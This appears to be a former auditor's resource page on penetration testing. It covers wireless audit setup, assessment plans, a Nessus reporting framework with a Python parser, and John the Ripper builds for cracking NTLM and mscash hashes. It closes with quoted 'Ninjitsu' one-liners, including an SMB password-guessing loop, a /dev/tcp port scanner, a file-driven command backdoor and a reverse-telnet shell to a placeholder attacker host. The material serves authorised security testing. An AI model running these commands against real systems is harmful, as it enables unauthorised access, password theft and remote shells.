I created a tutorial on how to set up and configure the Nokia N810 Internet Tablet to conduct a wireless assessment or audit. The tutorial covers setting up Kismet (old-core and new-core), aircrack-ng (airbase-ng and aircrack-ng), and btscanner. I'm still working on developing steps to install Metasploit and Karmetasploit for wireless client attacks. The tutorial also details using the internal GPS as well as adding an external wireless adapter. The latest version of the tutorial can be found here.
I put together another Technical Assessment Plan, this one for assessing the SNMP protocol. It uses open source and freely downloadable utilities, and is aimed at auditors who do not have access to or cannot afford the SolarWinds toolset. This is version 0.1 of the document; I plan on making updates and adding new tools in the future.
I created Project RF to have a reporting framework that provides consistent reports for various vulnerability scanning tools. The project started with support for Nessus back when I would parse .nbe files. I've since included reporting for eEye Retina, Nmap, HP WebInspect, AppScan, AppDetective, Kismet, and GFI LANguard. This project is still in its alpha stages as I'm not a top-notch web developer. Scan results are exported to XML, which is then uploaded, parsed, and imported into a backend MySQL database. I have found this framework very useful in generating reports for my workpapers. I still continue to work on this project even though I'm no longer an auditor. Recently I stripped it down to just Nessus and rewrote the Nessus portion to support the .nessus v2 XML output. Installation and setup instructions can be found here.
This framework supports many options for report generation and executive reporting.
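As an added example (not Project RF's own code), here is a minimal version of the parse-and-import step for a .nessus v2 export, with sqlite3 standing in for the MySQL backend. The two-finding scan embedded below is constructed for the example, and the table name `findings`, its columns, and the severity labels are assumptions about how such a framework might store results, not Project RF's schema.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed .nessus v2 sample (not real scan output): one host, one Critical and one Info item.
SAMPLE_NESSUS_V2 = """<NessusClientData_v2>
  <Report name="Example external scan">
    <ReportHost name="10.10.10.5">
      <HostProperties>
        <tag name="host-ip">10.10.10.5</tag>
        <tag name="host-fqdn">fileserver.example.test</tag>
        <tag name="operating-system">Windows Server 2003</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="100001"
                  pluginName="Constructed critical finding" pluginFamily="Windows">
        <risk_factor>Critical</risk_factor>
        <cvss_base_score>10.0</cvss_base_score>
        <description>Placeholder description used only to exercise the parser.</description>
        <plugin_output>Placeholder plugin output.</plugin_output>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="100002"
                  pluginName="Constructed informational finding" pluginFamily="General">
        <risk_factor>None</risk_factor>
        <description>Informational item with no CVSS score.</description>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Nessus v2 severity scale 0-4; the labels are an assumption for the report.
SEVERITY_LABEL = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Assumed schema. The UNIQUE constraint makes re-uploading the same export idempotent.
SCHEMA = """
CREATE TABLE IF NOT EXISTS findings (
    report TEXT, host_ip TEXT, fqdn TEXT, os TEXT,
    port INTEGER, protocol TEXT, service TEXT,
    severity INTEGER, plugin_id INTEGER, plugin_name TEXT, plugin_family TEXT,
    risk_factor TEXT, cvss REAL, description TEXT, plugin_output TEXT,
    UNIQUE (report, host_ip, port, protocol, plugin_id)
);
"""


def parse_nessus_v2(xml_text):
    """Yield one dict per ReportItem, joined with the properties of its ReportHost."""
    root = ET.fromstring(xml_text)
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a .nessus v2 export: root element is %s" % root.tag)
    for report in root.findall("Report"):
        for host in report.findall("ReportHost"):
            props = {t.get("name"): (t.text or "") for t in host.findall("HostProperties/tag")}
            for item in host.findall("ReportItem"):
                yield {
                    "report": report.get("name", ""),
                    "host_ip": props.get("host-ip", host.get("name", "")),
                    "fqdn": props.get("host-fqdn", ""),
                    "os": props.get("operating-system", ""),
                    "port": int(item.get("port", "0")),
                    "protocol": item.get("protocol", ""),
                    "service": item.get("svc_name", ""),
                    "severity": int(item.get("severity", "0")),
                    "plugin_id": int(item.get("pluginID", "0")),
                    "plugin_name": item.get("pluginName", ""),
                    "plugin_family": item.get("pluginFamily", ""),
                    "risk_factor": item.findtext("risk_factor", ""),
                    "cvss": float(item.findtext("cvss_base_score") or 0.0),
                    "description": (item.findtext("description") or "").strip(),
                    "plugin_output": (item.findtext("plugin_output") or "").strip(),
                }


def import_findings(conn, xml_text):
    """Parse an export and load it; returns the number of ReportItems parsed."""
    conn.executescript(SCHEMA)
    rows = list(parse_nessus_v2(xml_text))
    conn.executemany(
        "INSERT OR IGNORE INTO findings VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)",
        [(r["report"], r["host_ip"], r["fqdn"], r["os"], r["port"], r["protocol"],
          r["service"], r["severity"], r["plugin_id"], r["plugin_name"], r["plugin_family"],
          r["risk_factor"], r["cvss"], r["description"], r["plugin_output"]) for r in rows])
    conn.commit()
    return len(rows)


def executive_summary(conn):
    """Finding counts per severity label, the roll-up an executive report opens with."""
    cur = conn.execute("SELECT severity, COUNT(*) FROM findings GROUP BY severity ORDER BY severity DESC")
    return {SEVERITY_LABEL.get(sev, str(sev)): n for sev, n in cur}


def load_sample():
    """Import the constructed sample into an in-memory database."""
    conn = sqlite3.connect(":memory:")
    return conn, import_findings(conn, SAMPLE_NESSUS_V2)


if __name__ == "__main__":
    conn, n = load_sample()
    print("imported %d findings" % n, executive_summary(conn))
```

Two caveats for a framework that accepts uploaded exports: xml.etree expands internal entities, so parse files from outside your control with defusedxml (or an equivalent hardened parser) rather than the stock module, and key the uniqueness constraint on the fields that identify a finding so that a re-uploaded scan updates rather than duplicates the workpaper evidence.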
I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities a penetration tester would use. The assessment plans are structured to help document evidence for inclusion in the workpaper process. The plan provides helpful information on how to install, configure, and use the tools to obtain the evidence needed for an engagement. The Technical Assessment Plans that I have created can be found here.
A question was raised today during a presentation about which utilities you can use without installing them. There are engagements where the auditor is not allowed to use their own laptop and must use one provided by the auditee. This severely limits how effective an engagement can be, but it is not impossible to obtain the information you need once you connect to the auditee's network. I've made changes to the Security Tools page to highlight which tools are stand-alone and do not require installation. Also for reference see Penetration Testing Ninjitsu, which I pulled from a Core Security webcast.
NA CACS conference hosted by ISACA (18-22 April 2010)
Remote Security Testing for Web Applications
Presented by David Rhoades
Maven Security Consulting
Attending this conference workshop session introduced me to Maven Security's Web Security Dojo. This is an Ubuntu-based virtual image that includes several free and open source tools used for web application auditing. The image also includes deliberately vulnerable web applications so you can learn the tools against common vulnerability classes. This pre-configured environment is perfect for educational purposes. They also include a Bash script that sets up the same tools on your own Ubuntu system.
9.19.2011 – Updated for the latest OpenSSL and John jumbo patch on Ubuntu 11.04 (Natty Narwhal)
Password cracking Windows hashes on Linux using John the Ripper (JtR). If you prefer the Linux operating system, JtR is the password cracking utility to use. By default JtR does not support the Windows hashes we are interested in cracking; applying the jumbo patch adds the functionality to crack NTLM (NT hash) and MS-Cache passwords. The mscash format handles the DCC1 credentials cached by XP and Server 2003; Vista and later cache DCC2, which the jumbo builds crack with --format=mscash2 and which is far slower because it is PBKDF2-based. See below for installation and patching instructions for JtR. NOTE: This install was done on Ubuntu 10.04 LTS but should work on any Linux system since we are compiling from source.
$ ./john --format=mscash --rules --wordlist=<PASSWORD_LIST> <CACHE_HASH_FILE>
$ ./john --format=nt --rules --wordlist=<PASSWORD_LIST> <NTLM_HASH_FILE>
For additional information you can read the JtR documentation and wiki from Openwall.
OpenSSL is needed. It can be installed through your package manager or may already be installed; remember to install the development package as well (libssl-dev on Debian/Ubuntu, openssl-devel on Red Hat-based systems). Instructions for downloading and compiling from source are included below.
JtR 1.7.8
$ wget http://www.openssl.org/source/openssl-1.0.0e.tar.gz
$ tar zxvf openssl-1.0.0e.tar.gz
$ cd openssl-1.0.0e
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ wget http://www.openwall.com/john/g/john-1.7.8-jumbo-5.tar.gz
$ tar zxvf john-1.7.8-jumbo-5.tar.gz
$ cd john-1.7.8-jumbo-5/
$ cd src/
$ make linux-x86-64
$ cd ../run/
JtR 1.7.7
$ wget http://www.openssl.org/source/openssl-1.0.0d.tar.gz
$ tar zxvf openssl-1.0.0d.tar.gz
$ cd openssl-1.0.0d
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ cd ..
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7.tar.gz
$ tar zxvf john-1.7.7.tar.gz
$ cd john-1.7.7/
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7-jumbo-6.diff.gz
$ gzip -d john-1.7.7-jumbo-6.diff.gz
$ patch -p1 < john-1.7.7-jumbo-6.diff
$ cd src/
$ make linux-x86-sse2
John is not installed system-wide; the john binary will be found in the run directory.
I have created an updated configuration document for my Motion Computing M1300 wireless tablet. This document details getting Ubuntu 8.04 LTS Hardy Heron up and running on the tablet. Included in the documentation are the steps to get Kismet, Aircrack-ng, and Karmetasploit up and running. Those steps will be helpful no matter what hardware you install Ubuntu on.
I have also created an updated configuration document for the setup of my Linux laptop that I use for penetration testing.
Core Security hosted a series of three webcasts with SANS called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these webcasts and downloading the slides for your reference. The commands below are extracted from the slides and can be very useful during a penetration test.
Ninjitsu I
Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
Ninjitsu II
Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Linux Command-Line Backdoor via "Reverse Telnet"
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]
Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Ninjitsu III
Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 127.0.0.1 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)
Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"
Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"
Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI
List Domain Password Settings
C:\> net accounts /domain